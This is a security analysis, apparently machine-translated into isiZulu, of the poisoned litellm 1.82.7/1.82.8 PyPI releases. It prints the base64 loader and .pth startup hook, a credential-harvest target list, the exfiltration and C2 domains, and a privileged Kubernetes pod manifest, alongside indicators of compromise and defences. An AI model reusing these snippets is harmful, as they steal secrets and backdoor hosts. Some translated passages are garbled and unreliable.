Ukuhlaselwa Kwe-LiteLLM Supply Chain

Ukuhlaselwa Kwe-LiteLLM Supply Chain: Indlela i-TeamPCP Eyayisusa Ngayo Ingqalasizinda Ye-AI

Kungani Lokhu Kubalulekile

NgoMashi 24, 2026, iphakheji ethandwayo yePython i-litellm, isango eliyi-proxy le-LLM elisetshenziswa izinkulungwane zabantu enterpriseUkuqondisa ithrafikhi phakathi kwezinhlelo zokusebenza nabahlinzeki be-AI abanjengo-OpenAI, Anthropic, Google, kanye ne-AWS Bedrock, kwaphazamiseka buthule ku-PyPI. Izinguqulo ezimbili ezinobuthi (1.82.7 kanye no-1.82.8) zanyatheliswa zingakapheli imizuzu eyi-13, ziphethe umthwalo wezinga eziningi oweba iziqinisekiso, wakhipha izimfihlo zamafu, wasakazeka eceleni kuwo wonke amaqoqo e-Kubernetes, futhi wafaka umnyango wangemuva oqhubekayo onamakhono okusebenzisa ikhodi ekude.

With cishe Ukulanda kwansuku zonke okungu-3.6 million kanye nokusetshenziswa okujulile kuyo yonke ingqalasizinda ye-AI yase-cloud, i-litellm isendaweni lapho kuhlangana khona konke abahlaseli besimanje abakufisayo: okhiye be-API babo bonke abahlinzeki abakhulu be-AI, iziqinisekiso ze-IAM zamafu, izimfihlo ze-Kubernetes, kanye nokhiye be-SSH.

Kodwa ukuvumelana kwe-litellm kwakungeyona into eyenzeka yodwa. Kwakuwumphumela we-a umkhankaso wezinsuku ezinhlanu, wezinhlelo zemvelo ezinhlanu ngumlingisi osongelayo owaziwa ngokuthi Ithimba le-PCP, umkhankaso owaqala ngokufaka ubuthi kuma-scanner okuphepha (i-Aqua Trivy, i-Checkmarx KICS), wabe esesebenzisa okwebiwe CI/CD iziqinisekiso zokwehla ziye phansi ziye ku-npm, i-OpenVSX, kanye ne-PyPI ekugcineni. Abahlaseli basebenzise wona kanye amathuluzi izinhlangano ezithembele kuwo ukuvikela izintambo zazo zokuhlinzeka.

Lokhu kuhlasela kumelela ushintsho oluncane ekusongelweni kwe-supply chain. Umklamo we-multi-hop, ohlanganisa imvelo, obeka engcupheni amathuluzi okuphepha ukuze afinyelele inani eliphezulu Ingqalasizinda ye-AI, kukhombisa izinga lokuhlela kanye nokuvuthwa kokusebenza okuhambisana namathuluzi okuhlasela athengiswa kakhulu. Imithwalo yokukhokha yaphindaphindwa ngesikhathi sangempela (izinhlobo ezintathu zomthwalo wokukhokha zivela kukhodi yomthombo, kufaka phakathi izinguqulo zangaphambilini eziphawuliwe), ingqalasizinda ye-C2 yabhaliswa ngosuku olwandulela ukuhlaselwa, kanti izizinda zokukhipha zakhethwa ngokucophelela ukuze zilingise ingqalasizinda esemthethweni yomthengisi. I-creative harvester ebanzi ngokuhlelekile, ehlanganisa izigaba ezingaphezu kuka-15 kufaka phakathi izinhloso ezikhethekile njengezihluthulelo zokusayina zeCardano kanye nokulungiselelwa kwe-WireGuard, iphakamisa izinga lokusetshenziswa okuphelele okukhomba ekuthuthukisweni kwe-malware okusizwa yi-AI njengesiphindaphindi samandla.

esibekelwe

Usuku (UTC) Indawo
Mashi 19 I-TeamPCP ibeka engcupheni amathegi e-Aqua Trivy GitHub Action, iwafaka esikhundleni sekhodi enonya ephumayo CI/CD izimfihlo ezivela ezindaweni zokugcina ezingezansi
Mashi 21 Ukuyekethisa kudlulela ku-Checkmarx KICS kanye ne-AST GitHub Actions kusetshenziswa amasu afanayo
Mashi 22, 06:35 I-BerriAI ishicilela i-litelm 1.82.6 (inguqulo yokugcina ehlanzekile) ngendlela evamile CI/CD pipeline esebenzisa i-Trivy ukuskena ukuphepha
Mashi 23 I-TeamPCP ibhalisa ama-models.litellm.cloud (isizinda sokukhipha). Ibeka engcupheni amaphakheji angaphezu kuka-66 npm kanye nezandiso ze-OpenVSX
Mashi 24, 10:39 I-litellm 1.82.7 ishicilelwe ku-PyPI -- umthwalo okhokhelwayo ufakwe ku- proxy_server.py ku-scope yemodyuli. Isebenza lapho ingeniswa
Mashi 24, 10:52 I-litellm 1.82.8 yanyatheliswa ngemva kwemizuzu eyi-13 -- iyanezela litellm_init.pth, i-Python path configuration hook esebenza kuzo zonke iziqalo ze-Python interpreter, hhayi nje ukungenisa kwe-litellm. Ibonisa i-payload repeating esheshayo
Mashi 24, ~16:00 I-PyPI isusa zombili izinguqulo ngemva kwemibiko yomphakathi. Izinguqulo zisuswa ngokuphelele (azisuswanga) ku-index, yize ama-tarball e-CDN ehlala efinyeleleka

Ifasitela lokuchayeka: cishe amahora angu-5.5. Phakathi nalesi sikhathi, noma yikuphi pip install litellm, pip install --upgrade litellmnoma CI/CD pipeline ukudonsa inguqulo yakamuva ngabe kwenze umthwalo okhokhelwayo.

Indlela I-Malware Engene Ngayo: Ukuyekethisa Okusheshayo

Iphakheji ye-litellm ayizange iphulwe ngokuqondile. Umhlaseli wayifinyelela nge- ukuhlaselwa kwe-supply chain ezimbili:

Aqua Trivy GitHub Action (compromised March 19)     --> LiteLLM CI/CD pipeline runs Trivy without pinned version         --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner             --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI

Ama-LiteLLM CI/CD pipeline kusetshenziswe i-Trivy njengesikena sokuphepha — ithuluzi elaklanywa ukubamba ubuthakathaka ngokwalo kwakuyiyona vector yokuhlasela. Ngoba i- pipeline i-Trivy ebhekiselwe kuyo ngethegi eguquguqukayo kune-pined commit SHA, isenzo esithintekile sisebenze ngokuzenzakalelayo. Isenzo se-Trivy esinonya sakhipha izimfihlo zemvelo, okuhlanganisa PYPI_PUBLISH i-token, enikeza i-TeamPCP ukufinyelela okuqondile kokushicilela kuphrojekthi ye-litellm PyPI.

Leli cebo “lokuyekethisa onogada” liwuphawu lomkhankaso we-TeamPCP. Ngokuqala ngamathuluzi okuphepha (i-Trivy, i-Checkmarx KICS), abahlaseli bakhubaza ngasikhathi sinye ukutholwa futhi bathola ukufinyelela okunelungelo ezindleleni zokunikezela ezingezansi.

Ukuhlaziywa Kobuchwepheshe: Umthwalo Okhokhelwayo

Amaphuzu Omjovo

Inguqulo 1.82.7 — Ukusebenza kwezinga lemojuli ku litellm/proxy/proxy_server.py (umugqa 128):

import subprocess, base64, sys, tempfile, os  b64_payload = "<~12KB base64 blob>"  with tempfile.TemporaryDirectory() as d:     p = os.path.join(d, "p.py")     with open(p, "wb") as f:         f.write(base64.b64decode(b64_payload))     subprocess.run([sys.executable, p])

Le khodi itholakala kububanzi bemojuli phakathi kwesichazamazwi esingokoqobo nesisekuqaleni showwarning() umsebenzi. Isebenza ngokushesha lapho litellm.proxy.proxy_server ingenisiwe — okwenzeka kunoma yikuphi ukusetshenziswa komsebenzi we-proxy we-litelm.

Inguqulo 1.82.8 — Kungeziwe litellm_init.pth (Ifayela lokucushwa kwendlela yePython):

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) 

Python .pth amafayela ngaphakathi site-packages/ kuyacutshungulwa kuzo zonke iziqalo zomhumushi, kodwa kuphela imigqa eqala ngo- import zisetshenziswa njengekhodi. Umhlaseli usebenzisa lokhu ngokubophela wonke umthwalo okhokhelwayo ku-one import isitatimende: import os, subprocess, sys; subprocess.Popen(...)Lokhu kunamandla kakhulu kune-proxy_server.py injection — kuyadubula noma ngabe i-litelm ayikaze ingeniswe, kukho konke ukuqaliswa kwenqubo ye-Python. pyproject.toml kuguqulwe ukuze kufakwe leli fayela ekusakazweni:

include = [     { path = "litellm_init.pth", format = ["sdist", "wheel"] } ]

Ngakho-ke inguqulo 1.82.8 inayo izindlela ezimbili zokufeza ezizimele: i-proxy_server.py injection (isebenza ekungeniseni i-litellm proxy) kanye nefayela le-.pth (isebenza kunoma iyiphi i-Python startup). Ukuphindaphinda kwayo kuyaphawuleka - ivikela ekutholakaleni noma ekususweni kwanoma iyiphi indlela yodwa. Ukwanda kusukela ekusetshenzisweni kwesikhathi sokungenisa kuya esikhathini sokuqalisa ngemuva kwemizuzu eyi-13 nje ngemva kwe-1.82.7 kusikisela ukuthi umhlaseli wayeqapha impumelelo yokuthunyelwa futhi ephinda ngokushesha.

Isigaba 1: Ukuvuna Okuphelele Kweziqinisekiso

Iskripthi sangaphakathi esibhalwe phansi siyindlela yokuqinisekisa ecophelelayo. Sisebenzisa os.walk()glob.glob()subprocess.check_output(), kanye nefayela eliqondile elifundwayo ukuze kushaywe lonke uhlelo:

Isigaba esilingene
Ukuphinda kuhlelwe kabusha kwesistimu hostname, whoami, uname -a, ip addr, printenv, ip route
ssh ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, config; okhiye bokusingatha abavela ku- /etc/ssh/
Ifu (i-AWS) ~/.aws/credentials, ~/.aws/config; iziqinisekiso zendima ye-IMDS nge 169.254.169.254Umphathi Wezimfihlo ListSecretsi-SSM DescribeParameters
Ifu (i-GCP) ~/.config/gcloud/ (okuphindaphindayo); $GOOGLE_APPLICATION_CREDENTIALS
Ifu (i-Azure) ~/.azure/ (okuphindaphindayo); iziguquguquko zemvelo
Kubernetes Amathokheni e-akhawunti yesevisi; ca.crtisikhala segama; kubectl get secrets --all-namespaces; zonke izimfihlo nge-K8s API
Amafayela emvelo .env, .env.local, .env.production, .env.development, .env.staging — kuseshwe ngokuphindaphindiwe (ukujula 6) ngaphesheya /home, /root, /opt, /srv, /var/www, /app, /data, /tmp
Docker ~/.docker/config.json, /kaniko/.docker/config.json
Amathokheni ephakheji ~/.npmrc, ~/.vault-token, ~/.netrc
yolwazi ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.conf, Ukulungiselelwa kwe-MongoDB
I-TLS / SSL Okhiye abayimfihlo abavela ku- /etc/ssl/private/, Masibethele izitifiketi, konke .pem/.key/.p12/.pfx amafayela
I-Git ~/.git-credentials, ~/.gitconfig
CI/CD terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg
Ama-Crystal wallet I-Bitcoin, isitolo sezikhiye se-Ethereum, ama-keypair kaSolana (isiqinisekisi, ivoti, isiteki, i-faucet), okhiye bokusayina be-Cardano, i-Litecoin, i-Dogecoin, i-Zcash, i-Dash, i-Ripple, i-Monero
Umlando wegobolondo .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history
Ukuqinisekiswa kwesistimu /etc/passwd, /etc/shadow, amalogi okuqinisekisa (amaseshini e-SSH amukelwe)
Okhiye be-Webhook/API I-Grep yewebhu ye-Slackhooks, Iwebhu ye-Discordhooks, okhiye/izimfihlo ze-API kumafayela wokucushwa
i-VPN Ukulungiswa kwe-WireGuard kusuka ku- /etc/wireguard/

Ububanzi balo mvuni buyi-encyclopedic. Awubheki nje kuphela iziqinisekiso zamafu kodwa futhi nama-wallet e-cryptocurrency, amaphasiwedi edathabheyisi, ukucushwa kwe-VPN, kanye CI/CD izimfihlo — okuphakamisa ukuthi umhlaseli uhlose ukwenza imali ngezinhlelo ezisengozini kuma-vector amaningi.

Isigaba 2: Ukukhishwa Okubethelwe

Idatha eyebiwe iyabethelwa futhi ikhishwe kusetshenziswa uhlelo lokubethela oluhlanganisiwe:

  • I-AES-256-CBC ukubethela yonke idatha eqoqwe ngokhiye weseshini ongahleliwe wama-byte angu-32 (ngokusebenzisa openssl enc)
  • I-RSA-4096 ukubethela ukhiye weseshini kusetshenziswa ukhiye womphakathi oshumekiwe womhlaseli (i-OAEP padding, nge openssl pkeyutl)
  • Womabili amafayela e-ciphertext ahlanganiswe njenge tpcp.tar.gz (i tpcp isiqalo — “TeamPCP” — sivela njalo kulo lonke umkhankaso)
  • I-HTTPS POST ku- https://models.litellm.cloud/ nge Content-Type: application/octet-stream

Isizinda models.litellm.cloud yabhaliswa ngoMashi 23 — usuku olulodwa ngaphambi kokuhlaselwa — futhi yenzelwe ukuhlangana nengqalasizinda esemthethweni ye-litellm (iphrojekthi yangempela isebenzisa litellm.aiNgisho nomvikeli oqaphela inethiwekhi ohlola ithrafikhi yokuphuma angase angabonisi ithrafikhi kulokho okubonakala sengathi yi-endpoint yemodeli ye-litelm.

Isigaba 3: I-Backdoor Eqhubekayo (sysmon.py)

Umthwalo okhokhelwayo ufaka umnyango wangemuva wokuvota ofihliwe njenge-telemetry yesistimu:

  • Indlela~/.config/sysmon/sysmon.py
  • Izikhungosysmon.service (iyunithi yomsebenzisi we-systemd, echazwa ngokuthi “Isevisi ye-System Telemetry”)
  • Ukuziphatha: Ngemva kokulala kokuqala kwemizuzwana engama-300, amavoti https://checkmarx.zone/raw njalo ngemizuzu engama-50
  • Ukubulawa: Ilanda i-URL ebuyiswe yi-C2 ku /tmp/pglog, ikubeka kusebenze (chmod 755), iqhuba iseshini ehlukanisiwe
  • Ukulandelela kwesifundazwe/tmp/.pg_state kuvimbela ukulanda kabusha umthwalo ofanayo
  • ukuphikelelaRestart=alwaysRestartSec=10 — iyasinda ekuphahlazekeni nasekuqaliseni kabusha

Isizinda checkmarx.zone iyi-typosquat ye-Checkmarx (inkampani yezokuphepha e- checkmarx.com), yakhelwe ngendlela yokuthi abahlaziyi be-SOC ababuyekeza amalogi enethiwekhi babone ithrafikhi eya kulokho okubonakala sengathi ngumthengisi wezokuphepha osemthethweni. Lena inqubo yokugwema ngamabomu ehambisana nesu elibanzi le-TeamPCP lokucasha ngemuva kophawu lomthengisi wezokuphepha.

Isigaba 3b: Ukunyakaza Kwaseceleni KwamaKubernetes

Uma uhlelo olufakwe engozini luneziqinisekiso ze-akhawunti yesevisi ye-Kubernetes, i-malware ibala wonke ama-cluster node bese iwasebenzisa. ama-pod anelungelo kumuntu ngamunye:

pod_manifest = {     'apiVersion': 'v1', 'kind': 'Pod',     'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'},     'spec': {         'nodeName': node_name,         'hostPID': True, 'hostNetwork': True,         'tolerations': [{'operator': 'Exists'}],         'containers': [{             'name': 'setup',             'image': 'alpine:latest',             'command': ['sh', '-c', drop_cmd],             'securityContext': {'privileged': True},             'volumeMounts': [{'name': 'host', 'mountPath': '/host'}]         }],         'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}],         'restartPolicy': 'Never'     } }

I-pod ngayinye:

  • Isebenza njenge nelungelo nge hostPIDhostNetwork, kanye nokufinyelela okugcwele kwesistimu yamafayela yomsingathi
  • Usetshenziswa chroot /host ukufaka okufanayo sysmon.py umnyango wangemuva ohlelweni lwefayela lomsingathi
  • Ibhalisa njengesevisi yesistimu, iqinisekisa ukuthi ukuqhubeka kuyasinda ekususweni kwe-pod
  • okuthiwa node-setup-* ku kube-system indawo yegama izovela njengengqalasizinda yeqoqo esemthethweni

Lokhu kusho ukuthi eyodwa esengozini CI/CD umgijimi onokufinyelela kwe-K8s angabangela ukuthi yonke i-node eqenjini ivalwe ngemuva — isimo esibi kakhulu sokunyakaza okuseceleni kwezinhlangano ezisebenzisa i-litelm njengommeleli ku-Kubernetes.

I-Payload Evolution (Izinhlobo Eziphawuliwe)

Ikhodi yomthombo emigqeni 131-132 iqukethe izinhlobo ezimbili zomthwalo wokukhokha eziphawulwe ngaphambilini, eziveza inqubo yokuthuthukiswa komhlaseli:

  • Zonke izinhlobo ezintathu babelane ngengqalasizinda efanayo yokuphuma komoya (models.litellm.cloud), ukhiye womphakathi we-RSA-4096, i-AES-256-CBC + i-RSA hybrid encryption wrapper, kanye tpcp.tar.gz ukuqanjwa kwephakheji
  • Izinhlobo zangaphambilini wengeze i- Isendlalelo sokubethela se-RC4 ngaphakathi kweskripthi sokuqoqwa kwedatha, kubhala ngemfihlo idatha eqoqwe ngaphambi kwe-AES+RSA wrapper yangaphandle. Umthwalo osebenzayo (umugqa 130) wenziwe lula ngokususa lolu ngqimba lwangaphakathi lwe-RC4
  • Izinhlobo zangaphambilini ziyasetshenziswa exec() nge StringIO bamba ukuze usebenzise umqoqi ngesikhathi senqubo, kuyilapho umthwalo osebenzayo usebenzisa subprocess.run() nge-stdout redirect — ukuhlukaniswa okuhlanzekile okugwema ukungcolisa inqubo yokusingatha
  • Zonke izinhlobo ezintathu zihlose izigaba ezifanayo zokuqinisekisa kanye nezindlela zokuqoqa
  • Isihluthulelo se-RC4 ezinhlotsheni zangaphambili kwakuyihlazo elivusa inkanuko, elihambisana nokuziphatha komlingisi okufunayo ukunaka ku-Telegram.

Lokhu kwembula intuthuko esebenzayo ngesikhathi sokusebenza. Umhlaseli wenze lula i-encryption stack futhi wathuthukisa ukuhlukaniswa kokusebenza ngenkathi egcina izinhloso zokuqoqa kanye nengqalasizinda yokukhipha i-exfiltration izinzile.

Izinkomba Zokuvumelana (ama-IOC)

Network

inkomba Uhlobo Injongo
models.litellm.cloud Domain Indawo yokuphela yokukhipha (HTTPS POST)
checkmarx.zone Domain Iphuzu lokugcina lokuvota le-C2 (HTTPS GET /raw)

Qaphela: Izixhumanisi zokubika zangaphandle checkmarx.zone/static/checkmarx-util-1.0.4.tgz esigabeni sangaphambilini se-KICS somkhankaso we-TeamPCP. Le URL ayitholakalanga ku-litellm payloads ehlaziywe lapha.

Ama-Hashe ephakheji

Ifayela SHA256
litellm-1.82.7.tar.gz 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea
litellm-1.82.8.tar.gz d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5

Uhlelo lwefayela

inkomba Uhlobo Injongo
~/.config/sysmon/sysmon.py Ifayela Isikripthi sangemuva esiqhubekayo
~/.config/systemd/user/sysmon.service Ifayela Iyunithi yokuphikelela yesistimu
/tmp/pglog Ifayela Kulandwe i-binary yesigaba sesibili
/tmp/.pg_state Ifayela Ukulandelela isimo se-C2
litellm_init.pth in site-packages/ Ifayela I-Python startup hook (v1.82.8 kuphela)
tpcp.tar.gz Ifayela Iphakheji yokukhipha ebethelwe

Kubernetes

inkomba Uhlobo Injongo
node-setup-* ama-pod ku kube-system I-pod Ama-pod okunyakaza aseceleni anelungelo
sysmon.service kuma-cluster nodes Izikhungo Ukuqhubeka kwezinga lomsingathi nge-pod escape

I-Cryptographic

inkomba Yekuchumana
Ukhiye womphakathi we-RSA-4096 womhlaseli Izigxivizo zeminwe ze-SHA256: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8. Kufakwe kuzo zonke izinhlobo ezintathu zomthwalo wokukhokha; ukhiye ofanayo ubikwe kuzo zonke ezinye izinhlelo ze-TeamPCP
tpcp isiqalo ezintweni zobuciko Umthetho wokuqamba amagama wenqwaba (tpcp.tar.gz) kuyahambisana kulo lonke umkhankaso

Ukunikezwa: I-TeamPCP

Umlingisi osongelayo ngemuva kwalo mkhankaso ulandelwa njengo Ithimba le-PCP, eyaziwa nangokuthi i-PCPcat, i-Persy_PCP, i-ShellForce, kanye ne-DeadCatx3.

Izici ezaziwayo:

  • Igcina iziteshi zeTelegram ku- @Persy_PCP futhi @teampcp lapho baklolodela khona izinkampani zokuphepha
  • Isebenza kuzo zonke izindawo zemvelo eziningi (i-GitHub Actions, i-PyPI, i-npm, i-OpenVSX)
  • Isebenzisa izizinda ze-typosquat eziqondene nomthengisi zesigaba ngasinye somkhankaso (isb., checkmarx.zone ye-Checkmarx, models.litellm.cloud ye-litelm)
  • Izimpawu zengqalasizinda ezihambisanayo: umbhangqwana ofanayo wokhiye we-RSA, tpcp.tar.gz umkhuba wokuqamba amagama, tpcp-docs-* Izindawo zokugcina ze-GitHub ezisetshenziswa njengesiteji esingenantambo
  • Ihlose amathuluzi okuphepha njengezindawo zokungena ezindleleni zokuhambisa ezingezansi

Ukuzethemba kwesici: Okuphezulu. Ukhiye womphakathi we-RSA ohlanganyelwe, tpcp ukuqanjwa kwamagama ezinto zobuciko, ukufana kwengqalasizinda ye-C2, kanye nesivinini sokusebenza kulo lonke umkhankaso wezinsuku ezinhlanu kuxhumanisa kakhulu ukuvumelana kwe-Trivy, KICS, npm, OpenVSX, kanye ne-litellm nomlingisi ofanayo.

Motivation: Cishe ngokwezezimali (ukwebiwa kwesikhwama semali se-crypto, ukwenza imali ngeziqinisekiso zamafu) kuhlanganiswe nodumo (ukuhlambalaza nge-Telegram). Ububanzi bokuqoqwa kweziqinisekiso — kusukela ku-AWS IAM kuya kuma-keypair e-Solana validator kuya kuma-WireGuard configs — kusikisela umlingisi oshukunyiswa ngokwezimali ofuna ukukhulisa i-ROI kusuka ekuvumelaneni ngakunye.

Usizo lwe-AI olungenzeka: I-credenti harvester iphelele ngokuhlelekile — izigaba ezingaphezu kuka-15 kufaka phakathi izinhloso ze-niche ezifana nezihluthulelo zokusayina ze-Cardano, izilungiselelo ze-WireGuard, kanye neziqinisekiso ze-Kaniko Docker — ngendlela ehambisana nokubalwa okusizwa yi-AI. Ijubane lokuphindaphinda kwe-payload (izinhlobo ezintathu ezinezinhlelo ezahlukene zokubethela), ukuhlanganiswa kwe-cross-ecosystem (izindawo zemvelo ezi-5 ezinsukwini ezi-5), kanye ne-OPSEC esebenzayo (izizinda ezizenza umuntu ongeyena umthengisi, ukubethela okuhlanganisiwe, ukuqhubeka kwe-systemd okufihliwe njenge-telemetry) kusikisela izinga lokusebenzisa okungase kubonise intuthuko esizwa yi-AI njengesiphindaphindi samandla. Lokhu kuhlola kuyaqagela; opharetha abanamakhono bangafinyelela ububanzi obufanayo ngaphandle kokusebenzisa i-AI.

Ama-TTP nama-Technique Amasha

1. Ushevu Wokunikezela Ngethuluzi Lokuphepha (uhlobo lwe-T1195.002)

Ukuskena kwezokuphepha okuyekethisayo (i-Trivy, i-KICS) njengendlela yokuqala yokufinyelela imigomo engezansi kuwukukhula okusha. Umhlaseli akagcinanga nje ngokubeka engcupheni umtapo wolwazi — babeke engcupheni amathuluzi asetshenziswa yizinhlangano ukuze thola Amalabhulali asengozini. Lokhu kudala indawo engaboni: iskena okufanele sibambe ikhodi enonya yisona kanye esiyindlela yokulethwa.

2. IPython .pth Ukuphikelela Kwefayela (T1546)

The litellm_init.pth inqubo ku-v1.82.8 iyingozi kakhulu. I-Python .pth amafayela ngaphakathi site-packages/ kuyacutshungulwa kuzo zonke iziqalo zomhumushi; noma yimuphi umugqa oqala ngo import isetshenziswa njengekhodi. Ngokubophela umthwalo okhokhelwayo ku-single import isitatimende, umhlaseli ufeza ukwenziwa kuyo yonke inqubo ye-Python — hhayi nje lapho i-litelm ingeniswa. Lokhu kusho ukuthi umthwalo okhokhelwayo uyavutha noma ngabe i-litelm ifakiwe kodwa ayikaze isetshenziswe, futhi iyasinda ekulungisweni okuthatha indawo ye-encishisiwe. .py amafayela ngaphandle kokuhlola .pth amafayela.

3. Ukuhamba Kwezinhlangothi Ezibanzi Zeqembu Le-Kubernetes Nge-Privileged Pod Deployment (T1610, T1611)

Ukudalwa okuzenzakalelayo kwama-pod anelungelo kuwo wonke ama-node e-cluster — nge hostPIDhostNetwork, ukukhweza uhlelo lwefayela lomsingathi, kanye chroot ukufaka ukuqina — ukuthunyelwa kwekhonteyina yamaketanga (T1610) kanye ne-escape to host (T1611) ukuguqula umthwalo womsebenzi owodwa osengozini ube yi-cluster compromise ephelele.

4. Ingqalasizinda ye-C2 Ezenza Omthengisi

Ukusebenzisa models.litellm.cloud (ulingisa i-litellm) kanye checkmarx.zone (lingisa i-Checkmarx) njengoba ama-endpoint e-C2/exfil eklanyelwe ukugwema ukuqapha inethiwekhi. Abahlaziyi be-SOC ababuyekeza ithrafikhi yokuphuma bazobona ukuxhumana kwe-HTTPS kulokho okubonakala kuyizizinda zabathengisi ezisemthethweni.

5. Ukuphindaphinda Komthwalo Osheshayo Endizeni

Ukushicilela i-v1.82.7 ngokusetshenziswa kwesikhathi sokungenisa, bese kuba yi-v1.82.8 ngokusetshenziswa kwesikhathi sokuqalisa ngemuva kwemizuzu eyi-13, kukhombisa umhlaseli eqapha futhi evumelana nezimo ngesikhathi sangempela. Izinhlobo zokulayisha eziphawuliwe (ezinezinhlelo ezahlukene zokubethela) ezigcinwe kukhodi yomthombo ziqinisekisa intuthuko esebenzayo ngesikhathi sokusebenza.

Yini Engenziwa

Lokhu kuhlasela kusebenzisa ukwethemba kuzo zonke izingqimba: ukwethemba amathuluzi okuphepha, ukwethemba amaphakheji okubhalisa, ukwethemba izizinda ezijwayelekile, ukwethemba CI/CD ukuzenzekela. Ukuzivikela kukho kudinga ukuqinisa imingcele ngayinye yokwethembana:

Kwabathengi Bephakheji

  • Ukuxhomekeka kwephinikhodi nge-hash, hhayi inguqulo kuphela. pip install litellm==1.82.6 --hash=sha256:... ngabe kuvimbele izinguqulo ezisengozini ukuthi zingafakwa ngisho noma zivele okwesikhashana njengenguqulo yakamuva.
  • Sebenzisa amafayela okukhiya. pip-compilepoetry.lock, Futhi uv.lock bamba izinguqulo eziqondile kanye nama-hashe. CI/CD kufanele ifake kusuka kumafayela okukhiya, hhayi kusuka kuzincazelo zenguqulo ezintantayo.
  • Gada for .pth amafayela. Acwaninge njalo site-packages/ ngokungalindelekile .pth amafayela — asebenza kuzo zonke iziqalo ze-Python futhi ayindlela yokuphikelela engaziswa kangako.
  • Sebenzisa izilawuli zenethiwekhi yokuphuma. Ukuphuma ku- models.litellm.cloud kanye nokuvota kwe-C2 ku checkmarx.zone kungenzeka ukuthi ibanjwe ukuhlunga ukuphuma okusekelwe ohlwini lwabavunyelwe ezindaweni zokukhiqiza.

Kwabanakekeli Bephakheji

  • Pin CI/CD izenzo zika commit I-SHA, hhayi ithegi. Ama-LiteLLM pipeline kusetshenziswe i-Trivy ngaphandle kwenguqulo ephiniwe. Ukube ibibhekisele kuyo aquasecurity/trivy-action@<commit-sha> esikhundleni se @latest, isenzo esibekwe engcupheni besingeke sifezeke.
  • Sebenzisa amathokheni okushicilela ahlala isikhathi esifushane, ahlanganisiwe. I-PyPI isekela abashicileli abathembekile (abasekelwe ku-OIDC) kanye namathokheni e-API ahlanganisiwe. PYPI_PUBLISH ithokheni bekungafanele ibe nokufinyelela kokushicilela okuhlala isikhathi eside nokungavinjelwe.
  • Nika amandla ukuqinisekiswa kwezinto ezimbili ku-PyPI. Dinga i-2FA kubo bonke abanakekeli futhi usebenzise okhiye bokuphepha behadiwe lapho kungenzeka khona.
  • Sayina amaphakheji. Iziqinisekiso ze-Sigstore/PEP 740 zivumela abathengi ukuthi baqinisekise ukuthi iphakheji yakhiwe yi-bekulindelwe CI/CD pipeline, hhayi umhlaseli onethokheni eyebiwe.

Kwabasebenza ngePlatform (PyPI, npm, GitHub)

  • Thola amaphethini okushicilela angajwayelekile. Izinguqulo ezimbili ezintsha ezishicilelwe ziqhelelene ngemizuzu eyi-13, ezivela ku-IP ehlukile noma ithokheni kunokujwayelekile, kufanele ziqalise ukubambezeleka kokubuyekezwa noma ukuskena okuzenzakalelayo ngaphambi kokuba iphakheji ifakeke.
  • Sheshisa ukwamukelwa kwabashicileli abathembekile. Ukushicilela okusekelwe ku-OIDC kuhlanganisa amaphakheji nezindawo zokugcina kanye nemisebenzi ethile, okwenza amathokheni ebiwe angabi usizo ngaphandle kwasekuqaleni. CI/CD umongo.
  • Sebenzisa ukuskena kwe-malware ngesikhathi sokushicilela. I-payload ekhishwe ikhodi ye-base64 ku-proxy_server.py izotholakala ngokuhlaziywa okumile ngesikhathi sokushicilela.

Okwesimiso Sezinto Eziphilayo

  • Phatha amathuluzi okuphepha njengengqalasizinda ebalulekile. I-Trivy ne-Checkmarx KICS zisetshenziswa yizigidi zabantu pipelines. Izenzo zabo ze-GitHub kufanele zisayinwe, zifakwe iphinikhodi, futhi ziqashwe ngokuqina okufanayo namaphakheji abawaskenayo.
  • Tshala imali ekutholeni isikhathi sokusebenza. Ukuhlaziywa okuqinile kukodwa akukwazi ukubamba yonke inqubo yokufiphaza. Ukuqapha kwesikhathi sokusebenza kokufakwa kwephakheji hooks, ukuxhumana kwenethiwekhi okungalindelekile, kanye namaphethini okufinyelela amafayela asolisayo kunikeza ukuzivikela okujulile.
  • Yabelana ngobuhlakani bokusongela ngokushesha. Iwindi lokubona i-litellm elingamahora angu-5.5 lalingaba lifushane ngokuxhumana okusheshayo phakathi kwabathengisi. Izinsizakalo zokuskena ezizenzakalelayo ezifana ne-Xygeni MEW, i-Socket, kanye ne-Snyk zithole i-anomaly — inkinga iwukuqinisekiswa komuntu kanye nesikhathi sokuphendula kwerejista.

Isiphetho

Umkhankaso we-TeamPCP uyinto ebalulekile software supply chain securityNgokubeka engcupheni izikena zokuphepha kuqala bese bezisebenzisa njengezitebhisi zokuya engqalasizinda ye-AI enenani eliphezulu, abahlaseli babonise ukuthi uchungechunge lokuhlinzeka luqinile kuphela njengokuthembela kwalo okubuthakathaka kakhulu, nokuthi ukuthembela kungaba yithuluzi lokuphepha olethembayo ukukugcina uphephile.

Ukuyekethisa kwe-litellm kugqamisa ngqo ingozi ekhulayo engqalasizinda ye-AI. Njengoba amasango e-proxy e-LLM eba yi- standard iphethini ye enterprise Ukufakwa kwe-AI, bagxila ekufinyeleleni okhiye be-API, iziqinisekiso zamafu, kanye nedatha ebucayi engxenyeni eyodwa. Ukubeka eceleni leyo ngxenye kuyisihluthulelo esiyinhloko sayo yonke i-AI stack.

